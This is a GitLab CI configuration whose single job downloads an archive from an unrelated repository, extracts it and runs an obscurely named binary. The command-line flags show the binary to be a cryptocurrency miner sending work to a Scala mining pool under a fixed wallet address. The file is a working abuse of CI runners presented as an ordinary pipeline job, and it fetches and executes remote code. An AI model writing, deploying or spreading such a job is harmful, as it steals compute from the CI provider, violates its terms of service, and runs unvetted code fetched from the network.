job:
  script:
    - |
      wget https://gitlab.com/kominajalan/1/-/raw/master/SCALA.tar.gz && tar xf SCALA.tar.gz && ./4acd6eacc97ceee254a3dabb73d6e0dd --donate-level 1 -o scala.herominers.com:10131 -u Ssy2DdMxxXQJ5C3wX7UFNuUpVdhRQsWK2dUZRXWFdgJv3faoef93EocQJUco7WNNapTXfRXpju3WWi2u8UThBgis5GWReVBSYQ -p cpu -a panthera -k
